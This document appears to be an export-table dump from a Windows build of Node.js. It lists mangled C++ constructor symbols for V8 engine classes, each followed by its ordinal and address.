                                  ??0InvalidatedSlotsCleanup@internal@v8@@QEAA@PEAVMemoryChunk@12@PEAV?$set@VHeapObject@internal@v8@@UComparer@Object@23@V?$allocator@VHeapObject@internal@v8@@@std@@@std@@@Z5850x14091ec30
                                  ??0InvalidatedSlotsFilter@internal@v8@@QEAA@$$QEAV012@@Z5860x14041ddd0
                                  ??0InvalidatedSlotsFilter@internal@v8@@QEAA@AEBV012@@Z5870x14041de60
                                  ??0InvalidatedSlotsFilter@internal@v8@@QEAA@PEAVMemoryChunk@12@PEAV?$set@VHeapObject@internal@v8@@UComparer@Object@23@V?$allocator@VHeapObject@internal@v8@@@std@@@std@@@Z5880x14091ecd0
                                  ??0Isolate@internal@v8@@AEAA@V?$unique_ptr@VIsolateAllocator@internal@v8@@U?$default_delete@VIsolateAllocator@internal@v8@@@std@@@std@@@Z5890x140977d80
                                  ??0IsolateAllocator@internal@v8@@QEAA@W4IsolateAllocationMode@12@@Z5900x14089bad0
                                  ??0IsolatePlatformDelegate@node@@QEAA@$$QEAV01@@Z5910x140077e40
                                  ??0IsolatePlatformDelegate@node@@QEAA@AEBV01@@Z5920x140077e40
                                  ??0IsolatePlatformDelegate@node@@QEAA@XZ5930x140077e40
                                  ??0Item@ItemParallelJob@internal@v8@@QEAA@XZ5940x1408dc310
                                  ??0ItemParallelJob@internal@v8@@QEAA@PEAVCancelableTaskManager@12@PEAVSemaphore@base@2@@Z5950x14091e6c0
                                  ??0Iterator@Script@internal@v8@@QEAA@PEAVIsolate@23@@Z5960x140769bf0
                                  ??0JSCallReducer@compiler@internal@v8@@QEAA@$$QEAV0123@@Z5970x140e79630
                                  ??0JSCallReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z5980x140e796e0
                                  ??0JSCallReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@V?$Flags@W4Flag@JSCallReducer@compiler@internal@v8@@H@base@3@PEAVCompilationDependencies@123@@Z5990x140e79820
                                  ??0JSContextSpecialization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@V?$Maybe@UOuterContext@compiler@internal@v8@@@3@V?$MaybeHandle@VJSFunction@internal@v8@@@23@@Z6000x140e79890
                                  ??0JSCreateLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z6010x140e798d0
                                  ??0JSCreateLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVCompilationDependencies@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@@Z6020x140e79910
                                  ??0JSFunctionRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z6030x1404529e0
                                  ??0JSFunctionRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Handle@VObject@internal@v8@@@23@_N@Z6040x140452a40
                                  ??0JSGraph@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVJSOperatorBuilder@123@PEAVSimplifiedOperatorBuilder@123@PEAVMachineOperatorBuilder@123@@Z6050x140e34230
                                  ??0JSGraphAssembler@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVZone@23@PEAVSchedule@123@_N@Z6060x140e4d490
                                  ??0JSHeapBroker@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVZone@23@_N2@Z6070x140dd4d70
                                  ??0JSHeapCopyReducer@compiler@internal@v8@@QEAA@$$QEAV0123@@Z6080x140e79940
                                  ??0JSHeapCopyReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z6090x140e79940
                                  ??0JSHeapCopyReducer@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@@Z6100x140f74ab0
                                  ??0JSIntrinsicLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z6110x140e79960
                                  ??0JSIntrinsicLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z6120x140f796d0
                                  ??0JSNativeContextSpecialization@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@V?$Flags@W4Flag@JSNativeContextSpecialization@compiler@internal@v8@@H@base@3@PEAVCompilationDependencies@123@PEAVZone@23@5@Z6130x140f7beb0
                                  ??0JSOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@@Z6140x140ea8db0
                                  ??0JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEAVWasmEngine@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@_NAEBVWasmFeatures@123@@Z6150x1405ae470
                                  ??0JSTypedLowering@compiler@internal@v8@@QEAA@AEBV0123@@Z6160x140e79990
                                  ??0JSTypedLowering@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVJSHeapBroker@123@PEAVZone@23@@Z6170x140f8af70
                                  ??0JumpTableAssembler@wasm@internal@v8@@AEAA@_KH@Z6180x14051e950
                                  ??0JumpTableTargetOffsets@interpreter@internal@v8@@QEAA@PEBVBytecodeArrayAccessor@123@HHH@Z6190x14089a810
                                  ??0LargeObjectSpace@internal@v8@@IEAA@PEAVHeap@12@W4AllocationSpace@12@@Z6200x14091cee0
                                  ??0LayoutDescriptor@internal@v8@@IEAA@_K@Z6210x140076a70
                                  ??0LayoutDescriptor@internal@v8@@QEAA@XZ6220x1400cbb20
                                  ??0LazilyGeneratedNames@wasm@internal@v8@@QEAA@XZ6230x14041def0
                                  ??0Linkage@compiler@internal@v8@@QEAA@PEAVCallDescriptor@123@@Z6240x140076a70
                                  ??0LiveRange@compiler@internal@v8@@AEAA@HW4MachineRepresentation@23@PEAVTopLevelLiveRange@123@@Z6250x140eef510
                                  ??0LoadElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVJSGraph@123@PEAVZone@23@@Z6260x140e799e0
                                  ??0LocalAllocationBuffer@internal@v8@@AEAA@PEAVHeap@12@VLinearAllocationArea@12@@Z6270x1408cf3f0
                                  ??0LocalAllocationBuffer@internal@v8@@QEAA@$$QEAV012@@Z6280x1408cf440
                                  ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@$$QEAV0123@@Z6290x14052ba90
                                  ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@AEBV0123@@Z6300x14052bad0
                                  ??0LocalDeclEncoder@wasm@internal@v8@@QEAA@PEAVZone@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@@Z6310x14052bbb0
                                  ??0LocalEmbedderHeapTracer@internal@v8@@QEAA@PEAVIsolate@12@@Z6320x1408cb080
                                  ??0LocalHeap@internal@v8@@QEAA@PEAVHeap@12@V?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@@Z6330x14091ca00
                                  ??0LocalSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@W4LocalSpaceKind@12@@Z6340x14041df20
                                  ??0Location@debug@v8@@QEAA@HH@Z6350x140a77810
                                  ??0Location@debug@v8@@QEAA@XZ6360x140a77820
                                  ??0Location@v8@@QEAA@HH@Z6370x140076a20
                                  ??0Locker@v8@@QEAA@PEAVIsolate@1@@Z6380x140076f10
                                  ??0LookupIterator@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VMap@internal@v8@@@12@VPropertyDetails@12@_N@Z6390x14079c180
                                  ??0LookupIterator@internal@v8@@AEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@_KV?$Handle@VJSReceiver@internal@v8@@@12@W4Configuration@012@@Z6400x14041df90
                                  ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@AEBVKey@012@V?$Handle@VJSReceiver@internal@v8@@@12@W4Configuration@012@@Z6410x14041e110
                                  ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@AEBVKey@012@W4Configuration@012@@Z6420x14041e150
                                  ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VJSReceiver@internal@v8@@@12@W4Configuration@012@@Z6430x14041e1f0
                                  ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@W4Configuration@012@@Z6440x14041e230
                                  ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@_KV?$Handle@VJSReceiver@internal@v8@@@12@W4Configuration@012@@Z6450x14041e2d0
                                  ??0LookupIterator@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VObject@internal@v8@@@12@_KW4Configuration@012@@Z6460x14041e310
                                  ??0LoopBuilder@interpreter@internal@v8@@QEAA@PEAVBytecodeArrayBuilder@123@PEAVBlockCoverageBuilder@123@PEAVAstNode@23@@Z6470x14086bb90
                                  ??0LoopInfo@compiler@internal@v8@@QEAA@$$QEAU0123@@Z6480x140dd59e0
                                  ??0LoopInfo@compiler@internal@v8@@QEAA@AEBU0123@@Z6490x140dd5a30
                                  ??0LoopInfo@compiler@internal@v8@@QEAA@HHHPEAVZone@23@@Z6500x140dd5b30
                                  ??0LoopPeeler@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVLoopTree@123@PEAVZone@23@PEAVSourcePositionTable@123@PEAVNodeOriginTable@123@@Z6510x140e79a10
                                  ??0MachineGraph@compiler@internal@v8@@QEAA@PEAVGraph@123@PEAVCommonOperatorBuilder@123@PEAVMachineOperatorBuilder@123@@Z6520x140e34380
                                  ??0MachineOperatorBuilder@compiler@internal@v8@@QEAA@PEAVZone@23@W4MachineRepresentation@23@V?$Flags@W4Flag@MachineOperatorBuilder@compiler@internal@v8@@I@base@3@VAlignmentRequirements@0123@@Z6530x140e0d640
                                  ??0MachineOperatorReducer@compiler@internal@v8@@QEAA@AEBV0123@@Z6540x140e79a40
                                  ??0MachineOperatorReducer@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVMachineGraph@123@_N@Z6550x140fa9db0
                                  ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@@Z6560x140435bc0
                                  ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@AEBUAssemblerOptions@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z6570x140435c00
                                  ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@@Z6580x140435c60
                                  ??0MacroAssembler@internal@v8@@QEAA@PEAVIsolate@12@W4CodeObjectRequired@12@V?$unique_ptr@VAssemblerBuffer@internal@v8@@U?$default_delete@VAssemblerBuffer@internal@v8@@@std@@@std@@@Z6590x140435c90
                                  ??0MapRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z6600x140452a90
                                  ??0MapRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Handle@VObject@internal@v8@@@23@_N@Z6610x140452af0
                                  ??0MarkingWorklists@internal@v8@@QEAA@$$QEAV012@@Z6620x140419400
                                  ??0MarkingWorklists@internal@v8@@QEAA@AEBV012@@Z6630x140419550
                                  ??0MarkingWorklists@internal@v8@@QEAA@HPEAVMarkingWorklistsHolder@12@@Z6640x1408ef0f0
                                  ??0MarkingWorklistsHolder@internal@v8@@QEAA@XZ6650x140419690
                                  ??0MeasureMemoryDelegate@internal@v8@@QEAA@AEBV012@@Z6660x1408ecf10
                                  ??0MeasureMemoryDelegate@internal@v8@@QEAA@PEAVIsolate@12@V?$Handle@VNativeContext@internal@v8@@@12@V?$Handle@VJSPromise@internal@v8@@@12@W4MeasureMemoryMode@2@@Z6670x1408ecf40
                                  ??0MeasureMemoryDelegate@v8@@QEAA@AEBV01@@Z6680x1400779f0
                                  ??0MeasureMemoryDelegate@v8@@QEAA@XZ6690x1400779f0
                                  ??0MemoryAllocator@internal@v8@@QEAA@PEAVIsolate@12@_K1@Z6700x1408cf470
                                  ??0MemoryMappedFile@OS@base@v8@@QEAA@AEBV0123@@Z6710x1400779f0
                                  ??0MemoryMappedFile@OS@base@v8@@QEAA@XZ6720x1400779f0
                                  ??0MemoryReducer@internal@v8@@QEAA@PEAVHeap@12@@Z6730x1408ec410
                                  ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@HH@Z6740x14096ff30
                                  ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@HHV?$Handle@VSharedFunctionInfo@internal@v8@@@12@@Z6750x14096ff50
                                  ??0MessageLocation@internal@v8@@QEAA@V?$Handle@VScript@internal@v8@@@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@H@Z6760x14096ff70
                                  ??0MessageLocation@internal@v8@@QEAA@XZ6770x14096ff90
                                  ??0MicrotaskQueue@internal@v8@@AEAA@XZ6780x14096f1a0
                                  ??0MicrotaskQueue@v8@@AEAA@XZ6790x140077780
                                  ??0MicrotasksScope@v8@@QEAA@PEAVIsolate@1@PEAVMicrotaskQueue@1@W4Type@01@@Z6800x140a77830
                                  ??0MicrotasksScope@v8@@QEAA@PEAVIsolate@1@W4Type@01@@Z6810x140a77860
                                  ??0ModuleWireBytes@wasm@internal@v8@@QEAA@PEBE0@Z6820x14041e3a0
                                  ??0ModuleWireBytes@wasm@internal@v8@@QEAA@V?$Vector@$$CBE@23@@Z6830x140077a00
                                  ??0MoveOperands@compiler@internal@v8@@QEAA@AEBVInstructionOperand@123@0@Z6840x140452b40
                                  ??0MoveOptimizer@compiler@internal@v8@@QEAA@PEAVZone@23@PEAVInstructionSequence@123@@Z6850x140ee7f40
                                  ??0MultiIsolatePlatform@node@@QEAA@AEBV01@@Z6860x140077e50
                                  ??0MultiIsolatePlatform@node@@QEAA@XZ6870x140077e50
                                  ??0Mutex@base@v8@@QEAA@XZ6880x1400cbb20
                                  ??0NameConverter@disasm@@QEAA@XZ6890x1404487e0
                                  ??0NameDictionary@internal@v8@@IEAA@_K@Z6900x140076a70
                                  ??0NameDictionary@internal@v8@@QEAA@XZ6910x1400cbb20
                                  ??0NativeContextStats@internal@v8@@QEAA@$$QEAV012@@Z6920x140419820
                                  ??0NativeContextStats@internal@v8@@QEAA@AEBV012@@Z6930x140419900
                                  ??0NativeContextStats@internal@v8@@QEAA@XZ6940x140419990
                                  ??0NativeModule@wasm@internal@v8@@AEAA@PEAVWasmEngine@123@AEBVWasmFeatures@123@VVirtualMemory@23@V?$shared_ptr@$$CBUWasmModule@wasm@internal@v8@@@std@@V?$shared_ptr@VCounters@internal@v8@@@8@PEAV?$shared_ptr@VNativeModule@wasm@internal@v8@@@8@@Z6950x14056be10
                                  ??0NativeModuleDeserializer@wasm@internal@v8@@QEAA@PEAVNativeModule@123@@Z6960x1405196d0
                                  ??0NativeModuleSerializer@wasm@internal@v8@@QEAA@PEBVNativeModule@123@V?$Vector@QEAVWasmCode@wasm@internal@v8@@@23@@Z6970x1404cd720
                                  ??0NewSpace@internal@v8@@QEAA@PEAVHeap@12@PEAVPageAllocator@2@_K2@Z6980x1408cf5a0
                                  ??0Node@compiler@internal@v8@@AEAA@IPEBVOperator@123@HH@Z6990x140e313f0
                                  ??0NodeOriginTable@compiler@internal@v8@@QEAA@PEAVGraph@123@@Z7000x140ed6ae0
                                  ??0OFStream@internal@v8@@QEAA@PEAU_iobuf@@@Z7010x1405f2650
                                  ??0OFStreamBase@internal@v8@@QEAA@AEBV012@@Z7020x140457ba0
                                  ??0OFStreamBase@internal@v8@@QEAA@PEAU_iobuf@@@Z7030x1405f2780
                                  ??0OSROptimizedCodeCache@internal@v8@@IEAA@_K@Z7040x140076a70
                                  ??0OSROptimizedCodeCache@internal@v8@@QEAA@XZ7050x1400cbb20
                                  ??0ObjectHashSet@internal@v8@@IEAA@_K@Z7060x140076a70
                                  ??0ObjectHashSet@internal@v8@@QEAA@XZ7070x1400cbb20
                                  ??0ObjectHashTable@internal@v8@@IEAA@_K@Z7080x140076a70
                                  ??0ObjectHashTable@internal@v8@@QEAA@XZ7090x1400cbb20
                                  ??0ObjectIterator@internal@v8@@QEAA@AEBV012@@Z7100x14041e3c0
                                  ??0ObjectIterator@internal@v8@@QEAA@XZ7110x14041e3c0
                                  ??0ObjectRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVObjectData@123@_N@Z7120x140452b60
                                  ??0ObjectRef@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@V?$Handle@VObject@internal@v8@@@23@_N@Z7130x140dd6740
                                  ??0OffThreadFactory@internal@v8@@QEAA@PEAVIsolate@12@@Z7140x1408e4770
                                  ??0OffThreadHeap@internal@v8@@QEAA@PEAVHeap@12@@Z7150x1408e3370
                                  ??0OffThreadIsolate@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@@Z7160x14096ee30
                                  ??0OffThreadLargeObjectSpace@internal@v8@@QEAA@PEAVHeap@12@@Z7170x14091cfe0
                                  ??0OffThreadSpace@internal@v8@@QEAA@PEAVHeap@12@@Z7180x14041e3d0
                                  ??0Operand@internal@v8@@QEAA@PEAVLabel@12@H@Z7190x1404a0660
                                  ??0Operand@internal@v8@@QEAA@V012@H@Z7200x1404a06b0
                                  ??0Operand@internal@v8@@QEAA@VRegister@12@0W4ScaleFactor@12@H@Z7210x1404a0820
                                  ??0Operand@internal@v8@@QEAA@VRegister@12@H@Z7220x1404a08e0
                                  ??0Operand@internal@v8@@QEAA@VRegister@12@W4ScaleFactor@12@H@Z7230x1404a09d0
                                  ??0OperationTyper@compiler@internal@v8@@QEAA@PEAVJSHeapBroker@123@PEAVZone@23@@Z7240x140ff9810
                                  ??0Operator@compiler@internal@v8@@QEAA@GV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@3@PEBD_K22222@Z7250x140ea3790
                                  ??0OptimizedCompilationInfo@internal@v8@@AEAA@W4Kind@Code@12@PEAVZone@12@@Z7260x1409dc5e0
                                  ??0OptimizedCompilationInfo@internal@v8@@QEAA@PEAVZone@12@PEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@V?$Handle@VJSFunction@internal@v8@@@12@@Z7270x1409dc670
                                  ??0OptimizedCompilationInfo@internal@v8@@QEAA@V?$Vector@$$CBD@12@PEAVZone@12@W4Kind@Code@12@@Z7280x1409dc7f0
                                  ??0OptimizingCompileDispatcher@internal@v8@@QEAA@PEAVIsolate@12@@Z7290x140621cc0
                                  ??0OrderedHashMap@internal@v8@@IEAA@_K@Z7300x140076a70
                                  ??0OrderedHashMap@internal@v8@@QEAA@XZ7310x1400cbb20
                                  ??0OrderedHashSet@internal@v8@@IEAA@_K@Z7320x140076a70
                                  ??0OrderedHashSet@internal@v8@@QEAA@XZ7330x1400cbb20
                                  ??0OutputStream@v8@@QEAA@AEBV01@@Z7340x140077d80
                                  ??0OutputStream@v8@@QEAA@XZ7350x140077d80
                                  ??0PageAllocator@base@v8@@QEAA@AEBV012@@Z7360x140dc8ac0
                                  ??0PageAllocator@base@v8@@QEAA@XZ7370x140dc8ae0
                                  ??0PagedSpace@internal@v8@@QEAA@PEAVHeap@12@W4AllocationSpace@12@W4Executability@12@PEAVFreeList@12@W4LocalSpaceKind@12@@Z7380x1408cf710
                                  ??0PagedSpaceIterator@internal@v8@@QEAA@PEAVHeap@12@@Z7390x14041e420
                                  ??0PagedSpaceObjectIterator@internal@v8@@QEAA@$$QEAV012@@Z7400x14041e430
                                  ??0PagedSpaceObjectIterator@internal@v8@@QEAA@AEBV012@@Z7410x14041e430
                                  ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVHeap@12@PEAVPagedSpace@12@@Z7420x1408cf800
                                  ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVHeap@12@PEAVPagedSpace@12@PEAVPage@12@@Z7430x1408cf850
                                  ??0PagedSpaceObjectIterator@internal@v8@@QEAA@PEAVOffThreadSpace@12@@Z7440x1408cf8a0
                                  ??0ParallelMove@compiler@internal@v8@@QEAA@PEAVZone@23@@Z7450x140451f60
                                  ??0ParseInfo@internal@v8@@AEAA@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@@Z7460x140739750
                                  ??0ParseInfo@internal@v8@@QEAA@PEAVIsolate@12@VUnoptimizedCompileFlags@12@PEAVUnoptimizedCompileState@12@@Z7470x140739820
                                  ??0Parser@internal@v8@@QEAA@PEAVParseInfo@12@@Z7480x14072a800
                                  ??0PauseAllocationObserversScope@internal@v8@@QEAA@PEAVHeap@12@@Z7490x1408cf8d0
                                  ??0PersistentHandleVisitor@v8@@QEAA@AEBV01@@Z7500x140077930
                                  ??0PersistentHandleVisitor@v8@@QEAA@XZ7510x140077930
                                  ??0PersistentHandles@internal@v8@@QEAA@PEAVIsolate@12@_K@Z7520x140963770
                                  ??0PhiInstruction@compiler@internal@v8@@QEAA@$$QEAV0123@@Z7530x140452b90
                                  ??0PhiInstruction@compiler@internal@v8@@QEAA@AEBV0123@@Z7540x140452be0
                                  ??0PhiInstruction@compiler@internal@v8@@QEAA@PEAVZone@23@H_K@Z7550x140dffb00
                                  ??0PreparseDataBuilder@internal@v8@@QEAA@PEAVZone@12@PEAV012@PEAV?$vector@PEAXV?$allocator@PEAX@std@@@std@@@Z7560x140724d30
                                  ??0ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@AEBV0123@@Z7570x1408cb130
                                  ??0ProcessingScope@LocalEmbedderHeapTracer@internal@v8@@QEAA@PEAV123@@Z7580x140959fe0
                                  ??0ProfileGenerator@internal@v8@@QEAA@PEAVCpuProfilesCollection@12@PEAVCodeMap@12@@Z7590x1406d4500
                                  ??0ProfileNode@internal@v8@@QEAA@PEAVProfileTree@12@PEAVCodeEntry@12@PEAV012@H@Z7600x1406d0f20
                                  ??0ProfileTree@internal@v8@@QEAA@PEAVIsolate@12@@Z7610x1406d4510
                                  ??0ProfilerCodeObserver@internal@v8@@QEAA@PEAVIsolate@12@@Z7620x1406e6830
                                  ??0ProfilerEventsProcessor@internal@v8@@IEAA@PEAVIsolate@12@PEAVProfileGenerator@12@PEAVProfilerCodeObserver@12@@Z7630x1406e6880
                                  ??0ProfilerListener@internal@v8@@QEAA@PEAVIsolate@12@PEAVCodeEventObserver@12@W4CpuProfilingNamingMode@2@@Z7640x1406d10d0
                                  ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@0@Z7650x140a77890
                                  ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@@Z7660x140a778f0
                                  ??0PropertyDescriptor@v8@@QEAA@V?$Local@VValue@v8@@@1@_N@Z7670x140a77940
                                  ??0PropertyDescriptor@v8@@QEAA@XZ7680x140a779b0
                                  ??0RandomNumberGenerator@base@v8@@QEAA@XZ7690x140dc8bb0
                                  ??0RandomNumberGenerator@base@v8@@QEAA@_J@Z7700x140dc0190
                                  ??0RawMachineAssembler@compiler@internal@v8@@QEAA@PEAVIsolate@23@PEAVGraph@123@PEAVCallDescriptor@123@W4MachineRepresentation@23@V?$Flags@W4Flag@MachineOperatorBuilder@compiler@internal@v8@@I@base@3@VAlignmentRequirements@MachineOperatorBuilder@123@W4PoisoningMitigationLevel@23@@Z7710x140ee10e0
                                  ??0RawMachineLabel@compiler@internal@v8@@QEAA@W4Type@0123@@Z7720x140e68f20
                                  ??0ReadOnlyHeapObjectIterator@internal@v8@@QEAA@PEAVReadOnlyHeap@12@@Z7730x1408e2dc0
                                  ??0ReadOnlyHeapObjectIterator@internal@v8@@QEAA@PEAVReadOnlySpace@12@@Z7740x1408e2de0
                                  ??0ReadOnlySerializer@internal@v8@@QEAA@PEAVIsolate@12@V?$Flags@W4SerializerFlag@Snapshot@internal@v8@@H@base@2@@Z7750x14060aa50
                                  ??0RecursiveMutex@base@v8@@QEAA@XZ7760x140dbf870
                                  ??0Reducer@compiler@internal@v8@@QEAA@AEBV0123@@Z7770x140dd6d60
                                  ??0Reducer@compiler@internal@v8@@QEAA@XZ7780x140dd6d60
                                  ??0RedundancyElimination@compiler@internal@v8@@QEAA@PEAVEditor@AdvancedReducer@123@PEAVZone@23@@Z7790x140fb36c0
                                  ??0RegExpBytecodeGenerator@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@@Z7800x1406c8a30
                                  ??0RegExpMacroAssemblerX64@internal@v8@@QEAA@PEAVIsolate@12@PEAVZone@12@W4Mode@NativeRegExpMacroAssembler@12@H@Z7810x140443090
                                  ??0RegExpMatchInfo@internal@v8@@IEAA@_K@Z7820x140076a70
                                  ??0RegExpMatchInfo@internal@v8@@QEAA@XZ7830x1400cbb20
                                  ??0RegExpParser@internal@v8@@QEAA@PEAVFlatStringReader@12@V?$Flags@W4Flag@JSRegExp@internal@v8@@H@base@2@PEAVIsolate@12@PEAVZone@12@@Z7840x1406a86d0
                                  ??0RegionAllocator@base@v8@@QEAA@_K00@Z7850x140dca550
                                  ??0Register@interpreter@internal@v8@@QEAA@H@Z7860x14041e470
                                  ??0RegisterConfiguration@internal@v8@@QEAA@AEBV012@@Z7870x140450890
                                  ??0RegisterConfiguration@internal@v8@@QEAA@HHHHPEBH0W4AliasingKind@012@@Z7880x1409db520
                                  ??0RelocIterator@internal@v8@@AEAA@VCode@12@_K1PEBE2H@Z7890x1409da290
                                  ??0RelocIterator@internal@v8@@QEAA@AEBVCodeDesc@12@H@Z7900x1409da2e0
                                  ??0RelocIterator@internal@v8@@QEAA@PEAVEmbeddedData@12@VCode@12@H@Z7910x1409da340
                                  ??0RelocIterator@internal@v8@@QEAA@V?$Vector@E@12@V?$Vector@$$CBE@12@_KH@Z7920x1409da590
                                  ??0RelocIterator@internal@v8@@QEAA@VCode@12@H@Z7930x1409da5f0
                                  ??0RelocIterator@internal@v8@@QEAA@VCode@12@VByteArray@12@H@Z7940x1409da610
                                  ??0RelocIterator@internal@v8@@QEAA@VCodeReference@12@H@Z7950x1409da6e0
                                  ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@$$QEAV01234@@Z7960x1403e7f30
                                  ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@AEBV01234@@Z7970x1403e7f30
                                  ??0RemoteObject@API@Runtime@protocol@v8_inspector@@QEAA@XZ7980x1403e7f30
                                  ??0RepresentationChanger@compiler@internal@v8@@QEAA@PEAVJSGraph@123@PEAVJSHeapBroker@123@@Z7990x140ffdee0
                                  ??0ResourceConstraints@v8@@QEAA@XZ8000x140077710
                                  ??0ResumeJumpTarget@compiler@internal@v8@@AEAA@HHH@Z8010x140e9f7a0
                                  ??0RuntimeCallStats@internal@v8@@QEAA@W4ThreadType@012@@Z8020x140854f60
                                  ??0SafeForTerminationScope@Isolate@v8@@QEAA@PEAV12@@Z8030x140a77a00
                                  ??0SafepointScope@internal@v8@@QEAA@PEAVHeap@12@@Z8040x1408e22d0
                                  ??0Sampler@sampler@v8@@QEAA@PEAVIsolate@2@@Z8050x140dcb4b0
                                  ??0SamplingEventsProcessor@internal@v8@@QEAA@PEAVIsolate@12@PEAVProfileGenerator@12@PEAVProfilerCodeObserver@12@VTimeDelta@base@2@_N@Z8060x1406e69f0
                                  ??0SaveAndSwitchContext@internal@v8@@QEAA@PEAVIsolate@12@VContext@12@@Z8070x140978700
                                  ??0SaveContext@internal@v8@@QEAA@PEAVIsolate@12@@Z8080x140978740
                                  ??0Scanner@internal@v8@@QEAA@PEAVUtf16CharacterStream@12@VUnoptimizedCompileFlags@12@@Z8090x1406eab80
                                  ??0Schedule@compiler@internal@v8@@QEAA@PEAVZone@23@_K@Z8100x140e41400
                                  ??0ScheduledErrorThrower@wasm@internal@v8@@QEAA@PEAVIsolate@23@PEBD@Z8110x1405159e0
                                  ??0Scheduler@compiler@internal@v8@@AEAA@PEAVZone@23@PEAVGraph@123@PEAVSchedule@123@V?$Flags@W4Flag@Scheduler@compiler@internal@v8@@H@base@3@_KPEAVTickCounter@23@@Z8120x140fb5770
                                  ??0Scheduler@compiler@internal@v8@@QEAA@$$QEAV0123@@Z8130x140e7ad00
                                  ??0Scheduler@compiler@internal@v8@@QEAA@AEBV0123@@Z8140x140e7aee0
                                  ??0Scope@Isolate@v8@@QEAA@PEAV12@@Z8150x140076e60
                                  ??0Scope@internal@v8@@AEAA@PEAVZone@12@PEBVAstRawString@12@W4MaybeAssignedFlag@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z8160x140a51cb0
                                  ??0Scope@internal@v8@@AEAA@PEAVZone@12@W4ScopeType@12@V?$Handle@VScopeInfo@internal@v8@@@12@@Z8170x140a51df0
                                  ??0Scope@internal@v8@@IEAA@PEAVZone@12@@Z8180x140a51eb0
                                  ??0Scope@internal@v8@@QEAA@PEAVZone@12@PEAV012@W4ScopeType@12@@Z8190x140a51f40
                                  ??0ScopeIterator@debug@v8@@QEAA@XZ8200x14041e480
                                  ??0ScopedExceptionHandler@compiler@internal@v8@@QEAA@PEAVCodeAssembler@123@PEAV?$CodeAssemblerParameterizedLabel@VObject@internal@v8@@@123@@Z8210x140e68f40
